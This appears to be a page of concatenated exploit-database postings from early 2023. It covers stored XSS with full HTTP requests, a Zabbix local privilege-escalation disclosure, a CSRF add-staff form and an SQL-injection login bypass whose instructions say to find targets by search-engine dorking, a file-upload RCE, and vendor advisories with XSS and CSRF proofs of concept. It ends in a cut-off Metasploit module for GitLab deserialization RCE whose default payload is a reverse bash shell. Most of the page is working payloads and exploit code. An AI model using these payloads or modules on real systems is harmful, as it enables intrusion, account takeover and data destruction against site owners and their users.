<pre><code># Exploit Title: Stored Cross Site Scripting on Best pos Management System<br /># Google Dork: NA<br /># Date: 14/2/2023<br /># Exploit Author: Ahmed Ismail (@MrOz1l)<br /># Vendor Homepage:<br />https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html<br /># Software Link:<br />https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip<br /># Version: 1.0<br /># Tested on: Windows 11<br /># CVE : NA<br /><br /># Description<br /><br />Payload : "><img src=x onerror=prompt(document.domain);><br /><br /># POC :<br />1- Head to Add Category on<br />"http://localhost/kruxton/index.php?page=add-category"<br /><br />2- On Name Parameter add our Payload "><img src=x<br />onerror=prompt(document.domain);><br /><br />3- After Adding This Category XSS will run<br /><br /><br />```<br /><br /><br />POST /kruxton/ajax.php?action=save_category HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)<br />Gecko/20100101 Firefox/109.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data;<br />boundary=---------------------------7128987773293048653857517<br />Content-Length: 442<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/kruxton/index.php?page=add-category<br />Cookie: PHPSESSID=61ubuj4m01jk5tibc7banpldao<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------7128987773293048653857517<br />Content-Disposition: form-data; name="id"<br /><br /><br />-----------------------------7128987773293048653857517<br />Content-Disposition: form-data; name="name"<br /><br />XSSPOC"><img src=x onerror=prompt(document.domain);><br />-----------------------------7128987773293048653857517<br />Content-Disposition: form-data; name="description"<br /><br />This is POC<br />-----------------------------7128987773293048653857517--<br />```<br /><br /><br /><br />--------------------------------------<br /><br /><br /><br /># Exploit Title: Stored Cross Site Scripting on Best pos Management System<br /># Google Dork: NA<br /># Date: 17/2/2023<br /># Exploit Author: Ahmed Ismail (@MrOz1l)<br /># Vendor Homepage:<br />https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html<br /># Software Link:<br />https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip<br /># Version: 1.0<br /># Tested on: Windows 11<br /># CVE : NA<br /><br /><br />Payload : "><img src=x onerror=prompt(document.domain);><br /><br /># POC :<br />1- Head to Add Category on<br />"http://localhost/kruxton/ajax.php?action=save_product"<br /><br />2- On Name Parameter add our Payload "><img src=x<br />onerror=prompt(document.domain);><br /><br />on description <img src=x onerror=prompt(2);><br /><br />3- After Adding This Category XSS will run<br /><br /><br /><br /><br /><br />```<br /><br />POST /kruxton/ajax.php?action=save_product HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)<br />Gecko/20100101 Firefox/109.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data;<br />boundary=---------------------------11015616619250686693182759357<br />Content-Length: 830<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/kruxton/index.php?page=add-product<br />Cookie: PHPSESSID=<COOKIE><br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------11015616619250686693182759357<br />Content-Disposition: form-data; name="id"<br /><br /><br />-----------------------------11015616619250686693182759357<br />Content-Disposition: form-data; name="category_id"<br /><br />3'<br />-----------------------------11015616619250686693182759357<br />Content-Disposition: form-data; name="name"<br /><br />XSSPOC2"><img src=x onerror=prompt(document.domain);><br />-----------------------------11015616619250686693182759357<br />Content-Disposition: form-data; name="description"<br /><br />XSSPOC2"><img src=x onerror=prompt(2);><br />-----------------------------11015616619250686693182759357<br />Content-Disposition: form-data; name="price"<br /><br />1122<br />-----------------------------11015616619250686693182759357<br />Content-Disposition: form-data; name="status"<br /><br />1<br />-----------------------------11015616619250686693182759357--<br /><br />```<br /></code></pre>
<pre><code># Exploit Title: Zabbix agents - Insecure Permissions on non-default installation directory location<br /># Discovery by: mmg<br /># Discovery Date: 2023-01-23<br /># Vendor Homepage: https://www.zabbix.com/download_agents<br /># Software Link Zabbix agent : https://cdn.zabbix.com/zabbix/binaries/stable/6.2/6.2.7/zabbix_agent-6.2.7-windows-amd64-openssl.msi<br /># Software Link Zabbix agent 2 : https://cdn.zabbix.com/zabbix/binaries/stable/6.2/6.2.7/zabbix_agent2-6.2.7-windows-amd64-openssl.msi<br /># Tested Version: Zabbix agent and Zabbix agent 2 (v6.2.6, v6.2.7 and older versions)<br /># Vulnerability Type: Local Privilege Escalation<br /># Tested on OS: Windows 10 Pro Version 22H2 (OS Build 19045.2486) x64 version<br /># CVSSv3 Vectors : https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H<br /># CVE N/A<br /><br /><br /># Step to discover:<br /><br />Go to Start and type powershell.<br />Enter the following command and press Enter:<br />Get-WmiObject win32_service | ?{ $_.Name -like '*zabbix*' -and $_.Pathname -notlike "*C:\Program Files*"}| select Name,PathName<br /><br /># Example of a vulnerable installation<br /><br />Name PathName<br />---- --------<br />Zabbix Agent "C:\Software\Zabbix Agent\zabbix_agentd.exe" --config "C:\Software\Zabbix Agent\zabbix_agentd.conf"<br />Zabbix Agent 2 "D:\software\Zabbix Agent 2\zabbix_agent2.exe" -c "D:\software\Zabbix Agent 2\zabbix_agent2.conf" -f=false<br /><br /># Exploit:<br /><br />A vulnerability was found in Zabbix Agents on non-default installation directory location. <br />The Zabbix Agent executables have incorrect permissions, allowing a local unprivileged user to replace it<br />with a malicious file that will be executed with "LocalSystem" privileges which will result in complete<br />compromise of Confidentiality, Integrity and Availability.<br /><br /><br /># Timeline<br />Jan 23, 2023 - Reported to Zabbix<br />Feb 1, 2023 - Zabbix does not consider this a vulnerability<br />Feb 6, 2023 - Requested official approval to disclose it<br />Feb 8, 2023 - Zabbix agrees with public disclosure<br />Feb 13, 2023 - Public disclosure<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Demanzo Matrimony v.1.5 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0.1(32-bit) | <br />| # Vendor : https://demanzo.com/matrimony-site-development/ | <br />| # Dork : Powered by ITAcumens or "Powered by Demanzo" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] infected file: add-staff.php<br /><br />[+] Inside folder /admin/add-staff.php<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Copy the code below and paste it into an HTML file.<br /><br />[+] Go to the line 2.<br /><br />[+] Set the target site link Save changes and apply . <br /><br /></div><br /> <form action="https://www.example/web/html/admin/add-staff.php" method="POST"><br /> <div id="msg"><br /> <div class="form-group ban_btm1 col-md-6 no_pad"><br /> <label class="control-label col-md-4 frm_pd">Name <span class="red">*</span> : </label><br /> <div class="col-md-8 frm_pd"><br /> <input required="" name="name" id="name" value="" type="text" class="form-control" placeholder="Enter Name"> <br /> </div><br /> </div><br /> <br /> <div class="form-group ban_btm1 col-md-6 no_pad"><br /> <label class="control-label col-md-4 frm_pd">Password <span class="red">*</span> : </label><br /> <div class="col-md-8 frm_pd"><br /> <input required="" name="pass" id="pass" value="" type="password" class="form-control" placeholder="Enter Password"> <br /> </div><br /> </div><br /> <br /> <div class="form-group ban_btm1 col-md-6 no_pad"><br /> <label class="control-label col-md-4 frm_pd">Email ID <span class="red">*</span> : </label><br /> <div class="col-md-8 frm_pd"><br /> <input required="" name="email" id="email" value="" type="email" class="form-control" placeholder="Enter Email ID"> <br /> </div><br /> </div><br /> <br /> <div class="form-group ban_btm1 col-md-6 no_pad"><br /> <label class="control-label col-md-4 frm_pd">Gender <span class="red">*</span> : </label><br /> <div class="col-md-8 frm_pd"> <br /> <input type="radio" name="gender" value="Male" checked=""><label class="rd_btn">Male</label><br /> <input type="radio" name="gender" value="Female"><label class="rd_btn">Female</label><br /> </div><br /> </div><br /> <br /> <div class="form-group ban_btm1 col-md-12 no_pad"><br /> <label class="control-label frm_pd col-md-2">Designation <span class="red">*</span> : </label><br /> <div class="col-md-10 frm_pd"><br /> <input required="" name="designation" value="" id="designation" type="text" class="form-control" placeholder="Enter Designation"> <br /> </div><br /> </div> <br /> <br /> <div class="form-group ban_btm1 col-md-12 no_pad"><br /> <label class="control-label col-md-2 frm_pd">Address <span class="red">*</span> : </label><br /> <div class="col-md-10 frm_pd"><br /> <textarea required="" name="address" id="address" rows="7" class="form-control" placeholder="Enter Address"></textarea> <br /> </div><br /> </div> <br /> <br /> <!-- <div class="form-group ban_btm1 col-md-12 no_pad"> --><br /> <!-- <label class="control-label col-md-2 frm_pd">Access Level <span class="red">*</span> : </label> --><br /> <!-- <div class="col-md-10 frm_pd chk_box"> --><br /> <!-- <input id="access1" type="checkbox" checked /> <label for="access1" class="col-lg-3 col-md-5 col-sm-6">All</label> --><br /> <!-- <input id="access2" type="checkbox" /> <label for="access2" class="col-lg-4 col-md-7 col-sm-6">Manage Plan</label> --><br /> <!-- <input id="access3" type="checkbox" /> <label for="access3" class="col-lg-5 col-md-5 col-sm-6">Manage Kootam / Kulam</label> --><br /> <!-- <input id="access4" type="checkbox" /> <label for="access4" class="col-lg-3 col-md-7 col-sm-6">To Approve</label> --><br /> <!-- <input id="access5" type="checkbox" /> <label for="access5" class="col-lg-4 col-md-5 col-sm-6">Manage Success Stories</label> --><br /> <!-- <input id="access6" type="checkbox" /> <label for="access6" class="col-lg-5 col-md-7 col-sm-6">Manage Advertisement</label> --><br /> <!-- <input id="access7" type="checkbox" /> <label for="access7" class="col-lg-3 col-md-5 col-sm-6">Manage Staff</label> --><br /> <!-- <input id="access8" type="checkbox" /> <label for="access8" class="col-lg-4 col-md-7 col-sm-6">Manage Member</label> --><br /> <!-- <input id="access9" type="checkbox" /> <label for="access9" class="col-lg-5 col-md-5 col-sm-6">Manage City</label> --><br /> <!-- <input id="access10" type="checkbox" /> <label for="access10" class="col-lg-3 col-md-7 col-sm-6">Manage State</label> --><br /> <!-- <input id="access11" type="checkbox" /> <label for="access11" class="col-lg-4 col-md-5 col-sm-6">Manage Country</label> --><br /> <!-- <input id="access12" type="checkbox" /> <label for="access12" class="col-lg-5 col-md-7 col-sm-6">Manage Education</label> --><br /> <!-- <input id="access13" type="checkbox" /> <label for="access13" class="col-lg-3 col-md-5 col-sm-6">Reports</label> --><br /> <!-- <input id="access14" type="checkbox" /> <label for="access14" class="col-lg-4 col-md-7 col-sm-6">Ematch</label> --><br /> <!-- <input id="access15" type="checkbox" /> <label for="access15" class="col-lg-5 col-md-5 col-sm-6">Advanced Search</label> --><br /> <!-- <input id="access16" type="checkbox" /> <label for="access16" class="col-lg-3 col-md-7 col-sm-6">Group Mail</label> --><br /> <!-- <input id="access17" type="checkbox" /> <label for="access17" class="col-lg-4 col-md-5 col-sm-6">Featured Profiles</label> --><br /> <!-- <input id="access18" type="checkbox" /> <label for="access18" class="col-lg-5 col-md-7 col-sm-6">Upgrade / Renewal Membership</label> --><br /> <!-- <input id="access19" type="checkbox" /> <label for="access19" class="col-lg-3 col-md-5 col-sm-6">Accounts </label> --><br /> <!-- <input id="access20" type="checkbox" /> <label for="access20" class="col-lg-4 col-md-7 col-sm-6">Logo</label> --><br /> <!-- <input id="access21" type="checkbox" /> <label for="access21" class="col-lg-5 col-md-5 col-sm-6">Religion</label> --><br /> <!-- </div> --><br /> <!-- </div> --><br /> <br /> <!-- <div class="form-group ban_btm1 col-lg-7 col-md-12 no_pad"> --><br /> <!-- <label class="control-label col-lg-4 col-md-2 frm_pd no_pad">IP Address Controls <span class="red">*</span> : </label> --><br /> <!-- <div class="col-lg-8 col-md-10 frm_pd chk_box"> --><br /> <!-- <input id="status1" type="checkbox" checked /> <label for="status1" class="col-md-4">All</label> --><br /> <!-- <input id="status2" type="checkbox" /> <label for="status2" class="col-md-8">192.168.10.156</label> --><br /> <!-- </div> --><br /> <!-- </div> --><br /> <br /> <div class="form-group ban_btm1 col-lg-5 col-md-12 no_pad"><br /> <label class="control-label col-lg-4 col-md-2 frm_pd no_pad">Staff Status <span class="red">*</span> : </label><br /> <div class="col-lg-8 col-md-10 frm_pd"> <br /> <input type="radio" name="status" value="0" checked=""><label class="rd_btn">Active</label><br /> <input type="radio" name="status" value="1"><label class="rd_btn">Inactive</label><br /> </div><br /> </div><br /> <br /> <div class="col-md-2 col-md-offset-5 col-sm-12"><br /> <input type="submit" class="ctn_btn no_mt1" value="Add" name="add"><br /> </div> <br /> <br /><br />Greetings to :===================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet| <br />==================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Argon Dashboard - v1.1.2 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0(64-bit) | <br />| # Vendor : https://www.creative-tim.com/product/argon-dashboard# | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : user : 'or''='@gmail.com1 & Pass : 'or''='<br /><br />[+] https://127.0.0.1/aadarshinstrumentscom/admin/examples/inquiry.php<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>## Title: atrocore-1.5.25 User interaction - Unauthenticated File upload - RCE<br />## Author: nu11secur1ty<br />## Date: 02.16.2023<br />## Vendor: https://atropim.com/<br />## Software: https://github.com/atrocore/atrocore/releases/tag/1.5.25<br />## Reference: https://portswigger.net/web-security/file-upload<br /><br />## Description:<br />The `Create Import Feed` option with `glyphicon-glyphicon-paperclip`<br />function appears to be vulnerable to User interaction -<br />Unauthenticated File upload - RCE attacks.<br />The attacker can easily upload a malicious then can execute the file<br />and can get VERY sensitive information about the configuration of this<br />system, after this he can perform a very nasty attack.<br /><br /><br />STATUS: HIGH Vulnerability CRITICAL<br /><br />[+]Payload:<br /><br />```PHP<br /><?php<br /> phpinfo();<br />?><br />```<br /><br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/atrocore/atrocore-1.5.25)<br /><br />## Reference:<br />[href](https://portswigger.net/web-security/file-upload)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/g8998d)<br /><br />## Time spend:<br />00:45:00<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html<br />https://cxsecurity.com/ and https://www.exploit-db.com/<br />0day Exploit DataBase https://0day.today/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230214-0 ><br />=======================================================================<br /> title: Multiple XSS Vulnerabilities<br /> product: B&R Systems Diagnostics Manager<br /> vulnerable version: >=3.00 and <=C4.93<br /> fixed version: >=D4.93<br /> CVE number: CVE-2022-4286<br /> impact: medium<br /> homepage: https://www.br-automation.com<br /> found: 2022-10-28<br /> by: S. Robertz (Office Vienna)<br /> G. Hechenberger (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Our slogan is our mission. The pursuit of Perfection in Automation has<br />inspired and guided B&R for over 40 years. To us, perfection means more<br />than developing the best solutions in industrial automation. It also means<br />developing the best relationships – with our customers and partners as<br />well as our employees and suppliers.<br /><br />Keen foresight and entrepreneurial courage helped us rise quickly into<br />the ranks of top global players in industrial automation. An intuitive sense<br />of market dynamics and emerging trends has established us as a pioneer,<br />leading the way with the most innovative technology on the market.<br /><br />Our role as the ABB Group's global center for machine and factory automation<br />strengthens our position of leadership and adds new momentum to our<br />impressive record of sustained growth."<br /><br />Source: https://www.br-automation.com/en/about-us/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a software update which should be installed immediately.<br /><br />SEC Consult highly recommends to perform a thorough security review of the<br />product conducted by security professionals to identify and resolve potential<br />further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Multiple Reflected Cross-Site-Scripting Vulnerabilities (CVE-2022-4286)<br />An attacker can execute arbitrary JavaScript code in the context of the<br />victim's session, thus perform all actions, exfiltrate information, etc.<br />In order to exploit this vulnerability the attacker will have to trick<br />the user into visiting a manipulated URL.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Multiple Reflected Cross-Site-Scripting Vulnerabilities (CVE-2022-4286)<br />The following URL has to be visited by the victim in order to execute<br />arbitrary JavaScript code.<br /><br />http://<PLC-IP>/sdm/cgiFileLoop.cgi?service=javascript:alert(document.domain);%2f%2f&type=512&scope=%3Cfile:///etc/passwd%3E&module=Snapshot&option=3<br /><br />A very similar vulnerability can be found at another endpoint of the<br />System Diagnostic Manager (SDM).<br /><br />http://<PLC-IP>/sdm/svg.cgi?type=cpuusage&index=1%3Cscript%3Ealert(document.domain)%3C/script%3E<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following device and firmware version has been tested:<br />* B&R X20CP3687X SwModuleVersion 186<br /><br />According to the vendor, all B&R Automation Runtime (AR) versions >=3.00 and <=C4.93<br />are affected.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-11-21: Contacting vendor through cybersecurity@br-automation.com.<br /> Sent encrypted advisory.<br />2022-11-22: Vendor requests B&R Automation Runtime version.<br />2022-12-01: Vendor confirms vulnerability. Will be fixed with next release.<br /> Asking for timeline.<br />2022-12-13: Advisory and patch will be published on 2023-02-10.<br /> Vendor offers to share the advisory for review purposes.<br />2023-01-25: Reviewing vendor advisory, receiving CVE + affected/fixed version<br /> numbers<br />2023-02-10: Vendor provides the patch.<br />2023-02-14: Coordinated release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor supplies a patch, which should be installed immediately.<br />The following version mitigates the identified XSS issues:<br />* B&R Automation Runtime version >=D4.93<br /><br />The vendor has published the following security advisory:<br />https://www.br-automation.com/downloads_br_productcatalogue/assets/1675607299099-en-original-1.0.pdf<br /><br /><br />Workaround:<br />-----------<br />Administrators can deactivate the System Diagnostics Manager in case it is not<br />needed.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br />EOF S. Robertz, G. Hechenberger / @2023<br /><br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Quiz And Survey Master<br />Vendor URL: https://wordpress.org/plugins/quiz-master-next/<br />Type: Cross-Site Request Forgery (CSRF) [CWE-352]<br />Date found: 2023-01-13<br />Date published: 2023-02-08<br />CVSSv3 Score: 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N)<br />CVE: CVE-2023-0292<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Quiz And Survey Master 8.0.8 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Quiz and Survey Master is the easiest WordPress Quiz Plugin which can be used<br />to create engaging content to drive traffic and increase user engagement.<br />Everything from viral quiz, trivia quiz, customer satisfaction surveys to employee<br />surveys. This plugin is the ultimate marketing tool for your website.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The plugin offers the ajax action "qsm_remove_file_fd_question" which is used to<br />delete uploaded media contents from the WordPress instance. However, the<br />functionality is not protected by an anti-CSRF token/nonce.<br /><br />Since there is no anti-CSRF token protecting this functionality, it is vulnerable<br />to Cross-Site Request Forgery attacks allowing an attacker to delete uploaded<br />media contents on behalf of the attacked user.<br /><br />To successfully exploit this vulnerability, a user with the right to access the<br />plugin must be tricked into visiting an arbitrary website while having an<br />authenticated session in the application.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />The following Proof-of-Concept would delete the uploaded media with the ID "1":<br /><br /><html><br /> <!-- CSRF PoC - generated by Burp Suite Professional --><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <form action="http://localhost/wp-admin/admin-ajax.php" method="POST"><br /> <input type="hidden" name="action" value="qsm_remove_file_fd_question" /><br /> <input type="hidden" name="media_id" value="1" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br /><br /><br />7. SOLUTION<br />===========<br />Update to version 8.0.9<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2023-01-13: Discovery of the vulnerability<br />2023-01-13: Wordfence (responsible CNA) assigns CVE-2023-0291<br />2023-01-18: Sent initial notification to vendor via contact form<br />2022-01-18: Vendor response<br />2022-01-21: Vendor releases version 8.0.9 which fixes the vulnerability<br />2022-02-08: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Quiz And Survey Master<br />Vendor URL: https://wordpress.org/plugins/quiz-master-next/<br />Type: Missing Authentication for Critical Function [CWE-306]<br />Date found: 2023-01-13<br />Date published: 2023-02-08<br />CVSSv3 Score: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)<br />CVE: CVE-2023-0291<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Quiz And Survey Master 8.0.8 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Quiz and Survey Master is the easiest WordPress Quiz Plugin which can be used<br />to create engaging content to drive traffic and increase user engagement.<br />Everything from viral quiz, trivia quiz, customer satisfaction surveys to employee<br />surveys. This plugin is the ultimate marketing tool for your website.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The plugin offers the ajax action "qsm_remove_file_fd_question" to unauthenticated<br />users which accepts a "media_id" parameter pointing to a any item uploaded through<br />WordPress' media upload functionality. However, this "media_id" is afterward used<br />in a forced wp_delete_attachment() call ultimately deleteing the media from the<br />WordPress instance.<br /><br />Successful exploits can allow an unauthenticated attacker to delete any (and all)<br />uploaded WordPress media files.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />The following Proof-of-Concept would delete the uploaded media with the ID "1":<br /><br />POST /wp-admin/admin-ajax.php HTTP/2<br />Host: localhost<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 44<br /><br />action=qsm_remove_file_fd_question&media_id=1<br /><br /><br />7. SOLUTION<br />===========<br />Update to version 8.0.9<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2023-01-13: Discovery of the vulnerability<br />2023-01-13: Wordfence (responsible CNA) assigns CVE-2023-0291<br />2023-01-18: Sent initial notification to vendor via contact form<br />2022-01-18: Vendor response<br />2022-01-21: Vendor releases version 8.0.9 which fixes the vulnerability<br />2022-02-08: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /><br /><br />--<br />Mit freundlichen Grüßen / With best regards / Atentamente<br /><br />Julien Ahrens<br />Freelancer | Penetration Tester<br /><br />RCE Security<br />VAT-ID: DE328576638<br />Website: www.rcesecurity.com<br /><br /><br />This e-mail may contain confidential and/or privileged information.<br />If you are not the intended recipient (or have received this e-mail in<br />error) please notify the sender immediately and destroy this e-mail.<br />Any unauthorized copying, disclosure or distribution of the material<br />in this e-mail is strictly forbidden.<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> include Msf::Exploit::Git::SmartHttp<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HttpServer<br /> include Msf::Exploit::Remote::HTTP::Gitlab<br /> include Msf::Exploit::RubyDeserialization<br /><br /> attr_accessor :cookie<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'GitLab GitHub Repo Import Deserialization RCE',<br /> 'Description' => %q{<br /> An authenticated user can import a repository from GitHub into GitLab.<br /> If a user attempts to import a repo from an attacker-controlled server,<br /> the server will reply with a Redis serialization protocol object in the nested<br /> `default_branch`. GitLab will cache this object and<br /> then deserialize it when trying to load a user session, resulting in RCE.<br /> },<br /> 'Author' => [<br /> 'William Bowling (vakzz)', # discovery<br /> 'Heyder Andrade <https://infosec.exchange/@heyder>', # msf module<br /> 'RedWay Security <https://infosec.exchange/@redway>', # PoC<br /> ],<br /> 'References' => [<br /> ['URL', 'https://hackerone.com/reports/1679624'],<br /> ['URL', 'https://github.com/redwaysecurity/CVEs/tree/main/CVE-2022-2992'], # PoC<br /> ['URL', 'https://gitlab.com/gitlab-org/gitlab/-/issues/371884'],<br /> ['CVE', '2022-2992']<br /> ],<br /> 'DisclosureDate' => '2022-10-06',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD],<br /> 'Privileged' => false,<br /> 'Stance' => Msf::Exploit::Stance::Aggressive,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),<br /> OptString.new('PASSWORD', [true, 'The password for the specified username', nil]),<br /> OptInt.new('IMPORT_DELAY', [true, 'Time to wait from the import task before try to trigger the payload', 5]),<br /> OptAddress.new('URIHOST', [false, 'Host to use in GitHub import URL'])<br /> ]<br /> )<br /> deregister_options('GIT_URI')<br /> end<br /><br /> def group_name<br /> @group_name ||= Rex::Text.rand_text_alpha(8..12)<br /> end<br /><br /> def api_token<br /> @api_token ||= gitlab_create_personal_access_token<br /> end<br /><br /> def session_id<br /> @session_id ||= Rex::Text.rand_text_hex(32)<br /> end<br /><br /> def redis_payload(cmd)<br /> serialized_payload = generate_ruby_deserialization_for_command(cmd, :net_writeadapter)<br /> gitlab_session_id = "session:gitlab:#{session_id}"<br /> # A RESP array of 3 elements (https://redis.io/docs/reference/protocol-spec/)<br /> # The command set<br /> # The gitlab session to load the payload from<br /> # The Payload itself. A Ruby serialized command<br /> "*3\r\n$3\r\nset\r\n$#{gitlab_session_id.size}\r\n#{gitlab_session_id}\r\n$#{serialized_payload.size}\r\n#{serialized_payload}"<br /> end<br /><br /> def check<br /> self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie<br /><br /> vprint_status('Trying to get the GitLab version')<br /><br /> version = Rex::Version.new(gitlab_version)<br /><br /> return CheckCode::Safe("Detected GitLab version #{version} which is not vulnerable") unless (<br /> version.between?(Rex::Version.new('11.10'), Rex::Version.new('15.1.6')) ||<br /> version.between?(Rex::Version.new('15.2'), Rex::Version.new('15.2.4')) ||<br /> version.between?(Rex::Version.new('15.3'), Rex::Version.new('15.3.2'))<br /> )<br /><br /> report_vuln(<br /> host: rhost,<br /> name: name,<br /> refs: 